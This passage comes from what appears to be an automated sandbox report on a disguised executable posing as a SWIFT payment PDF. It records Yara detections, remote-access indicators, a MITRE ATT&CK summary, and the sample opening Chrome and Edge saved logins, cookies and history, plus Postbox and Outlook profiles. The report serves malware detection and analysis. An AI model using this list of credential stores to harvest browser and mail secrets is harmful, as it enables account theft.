                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                Source: Yara match | File source: 00000002.00000002.4109031767.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4817a88.1.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 2.2.Swift Copy TT USDUSD$23,401.PDF.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4817a88.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.478fa68.3.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4707a48.2.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000002.00000002.4104888758.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.4109031767.0000000002E1B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.1674455094.00000000044D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: Swift Copy TT USDUSD$23,401.PDF.exe PID: 6716, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: Swift Copy TT USDUSD$23,401.PDF.exe PID: 5804, type: MEMORYSTR
                Source: Yara match | File source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4817a88.1.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 2.2.Swift Copy TT USDUSD$23,401.PDF.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4817a88.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.478fa68.3.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4707a48.2.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000002.00000002.4104888758.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.1674455094.00000000044D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: Swift Copy TT USDUSD$23,401.PDF.exe PID: 6716, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: Swift Copy TT USDUSD$23,401.PDF.exe PID: 5804, type: MEMORYSTR
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: Yara match | File source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4817a88.1.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 2.2.Swift Copy TT USDUSD$23,401.PDF.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4817a88.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.478fa68.3.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4707a48.2.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000002.00000002.4104888758.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.4109031767.0000000002E1B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.1674455094.00000000044D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: Swift Copy TT USDUSD$23,401.PDF.exe PID: 6716, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: Swift Copy TT USDUSD$23,401.PDF.exe PID: 5804, type: MEMORYSTR

                Remote Access Functionality

                Source: Yara match | File source: 00000002.00000002.4109031767.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4817a88.1.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 2.2.Swift Copy TT USDUSD$23,401.PDF.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4817a88.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.478fa68.3.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4707a48.2.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000002.00000002.4104888758.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.4109031767.0000000002E1B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.1674455094.00000000044D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: Swift Copy TT USDUSD$23,401.PDF.exe PID: 6716, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: Swift Copy TT USDUSD$23,401.PDF.exe PID: 5804, type: MEMORYSTR
                Source: Yara match | File source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4817a88.1.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 2.2.Swift Copy TT USDUSD$23,401.PDF.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4817a88.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.478fa68.3.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4707a48.2.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000002.00000002.4104888758.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.1674455094.00000000044D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: Swift Copy TT USDUSD$23,401.PDF.exe PID: 6716, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: Swift Copy TT USDUSD$23,401.PDF.exe PID: 5804, type: MEMORYSTR

                Mitre Att&ck Matrix

                Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
                Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
                Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
                Execution: Windows Management Instrumentation; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
                Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
                Privilege Escalation: 111 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
                Defense Evasion: 11 Masquerading; 1 Disable or Modify Tools; 31 Virtualization/Sandbox Evasion; 111 Process Injection; 1 Deobfuscate/Decode Files or Information; 131 Obfuscated Files or Information; 12 Software Packing; 1 Timestomp; 1 DLL Side-Loading
                Credential Access: 1 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
                Discovery: 1 Query Registry; 1 Security Software Discovery; 1 Process Discovery; 31 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 System Network Configuration Discovery; 13 System Information Discovery; System Owner/User Discovery; Network Sniffing
                Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
                Collection: 1 Email Collection; 11 Archive Collected Data; 1 Data from Local System; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
                Command and Control: 1 Web Service; 11 Encrypted Channel; 3 Ingress Tool Transfer; 4 Non-Application Layer Protocol; 15 Application Layer Protocol; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
                Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
                Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement